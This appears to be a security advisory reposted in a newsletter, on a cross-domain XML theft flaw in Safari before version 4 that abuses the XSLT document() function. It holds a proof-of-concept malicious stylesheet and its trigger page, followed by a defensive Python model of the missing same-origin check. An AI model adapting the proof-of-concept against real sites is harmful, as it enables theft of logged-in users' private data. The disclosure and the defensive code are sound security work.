11.54.56 Apple Safari cross-domain XML theft vulnerability
Safari prior to version 4 permits a malicious web page to steal arbitrary XML data cross-domain. The attack abuses a relatively obscure cross-origin access point that had no same-origin check at all: the document() function in XSLT. document() fetches an arbitrary URL from inside a stylesheet and returns the fetched XML as a node tree that the stylesheet can copy into its output. The browser attaches the victim's cookies to that fetch, so the data returned is whatever the logged-in user is allowed to see.

This is best illustrated with a sample evil XSL file which abuses this function (the address of the victim's mailbox is omitted here):

    <xsl:stylesheet version="1.0"
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
        xmlns:str="http://exslt.org/strings">
      <xsl:template match="*">
        <html>
          <body>
            Below, you should see e-mail stolen cross-domain!
            <p/>
            <xsl:value-of select="document('https://...')"/>
            <script>
              alert(document.body.innerHTML)
            </script>
          </body>
        </html>
      </xsl:template>
    </xsl:stylesheet>

The alert() only demonstrates that script running in the attacker's page can read the stolen text; since the generated HTML belongs to the attacker's origin, the same script could just as easily send it to the attacker's server.

To mount the attack, the attacker serves a web page with an XML MIME type which requests to be styled by the evil stylesheet:

    <?xml-stylesheet type="text/xsl" href="safaristealmailbug.xsl"?>
    <xml>
    irrelevant
    </xml>

The XML content itself is irrelevant: the stylesheet runs as soon as the page is loaded, and the victim needs only to visit the attacker's page while logged in to the target site.

There are a number of interesting XML-based formats you might want to steal, including authenticated RSS feeds, XML-formatted AJAX responses, and XHTML pages.

Full technical details: http://scary.beasts.org/

Blog post: http://scarybeastsecurity. (includes 1-click demo)

Cheers
Chris
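As an added example (not code from this post, nor from WebKit or Safari), the following Python models the check that document() was missing: before a stylesheet may load a URL, its origin is compared with the origin of the page being styled, and cross-origin loads are refused. The stylesheet, the hosts attacker.example and mail.example, the mailbox URL and the fake network responses are all constructed for the demo; the policy modelled (same-origin with the styled page, relative references resolved against the stylesheet) is a simplification of what a real browser enforces.

```python
# Same-origin gate for XSLT document() loads: added example, not code from
# the original post or from WebKit. It models the check Safari < 4 lacked:
# before document() fetches a URL, compare that URL's origin with the origin
# of the page that referenced the stylesheet. All hosts and URLs are made up.
import re
from urllib.parse import urljoin, urlsplit
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
DEFAULT_PORTS = {"http": 80, "https": 443}
# Matches document('...') or document("...") with a literal URL argument.
DOCUMENT_CALL = re.compile(r"""document\(\s*(['"])(.*?)\1""")


class CrossOriginLoad(PermissionError):
    """Raised when a stylesheet tries to document()-load a foreign origin."""


def origin_of(url):
    """Return the (scheme, host, port) origin tuple of an absolute URL."""
    parts = urlsplit(url)
    if parts.scheme not in DEFAULT_PORTS or not parts.hostname:
        raise ValueError("unsupported or relative URL: %r" % url)
    port = parts.port or DEFAULT_PORTS[parts.scheme]
    return (parts.scheme, parts.hostname.lower(), port)


def document_targets(stylesheet_xml, stylesheet_url):
    """List every literal URL passed to document() in an XSLT instruction,
    resolved against the stylesheet's own URL so relative references work."""
    root = ET.fromstring(stylesheet_xml)
    targets = []
    for el in root.iter():
        if not el.tag.startswith("{%s}" % XSL_NS):
            continue  # only XSLT instructions carry XPath expressions
        for attr in ("select", "test"):
            expr = el.get(attr)
            if expr:
                targets.extend(urljoin(stylesheet_url, m.group(2))
                               for m in DOCUMENT_CALL.finditer(expr))
    return targets


def gated_document_loads(stylesheet_xml, stylesheet_url, page_url, fetch):
    """Fetch each document() target only if it is same-origin with the page
    being styled. `fetch` is any callable url -> str, injected so the demo
    runs offline. Returns {url: content} or raises CrossOriginLoad."""
    page_origin = origin_of(page_url)
    loaded = {}
    for url in document_targets(stylesheet_xml, stylesheet_url):
        if origin_of(url) != page_origin:
            raise CrossOriginLoad("%s may not load %s" % (page_url, url))
        loaded[url] = fetch(url)
    return loaded


# Constructed stand-ins: a stylesheet shaped like the one in the post, with a
# hypothetical mailbox URL, and a fake network that answers every URL the way
# a cookie-carrying browser would (i.e. with the victim's private data).
EVIL_XSL = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="*">
    <html><body>
      <xsl:value-of select="document('https://mail.example/inbox.xml')"/>
    </body></html>
  </xsl:template>
</xsl:stylesheet>"""

FAKE_NET = {
    "https://mail.example/inbox.xml": "<inbox>secret mail</inbox>",
    "https://mail.example/feed.xml": "<rss/>",
}


def fake_fetch(url):
    return FAKE_NET[url]


def attack_blocked():
    """Page and stylesheet live on attacker.example: the mail load is refused."""
    try:
        gated_document_loads(EVIL_XSL, "http://attacker.example/steal.xsl",
                             "http://attacker.example/page.xml", fake_fetch)
    except CrossOriginLoad:
        return True
    return False


def same_origin_allowed():
    """A stylesheet on mail.example may still pull mail.example's own feed."""
    xsl = EVIL_XSL.replace("https://mail.example/inbox.xml", "feed.xml")
    return gated_document_loads(xsl, "https://mail.example/style.xsl",
                                "https://mail.example/page.xml", fake_fetch)


if __name__ == "__main__":
    print("cross-origin load blocked:", attack_blocked())
    print("same-origin load result:", same_origin_allowed())
```

Without the gate, the same call on attacker.example would have returned the contents of inbox.xml, which is exactly what the stylesheet in the post then copies into the attacker's page. Note that a scheme change alone (http page loading an https URL on the same host) is also a different origin and is blocked.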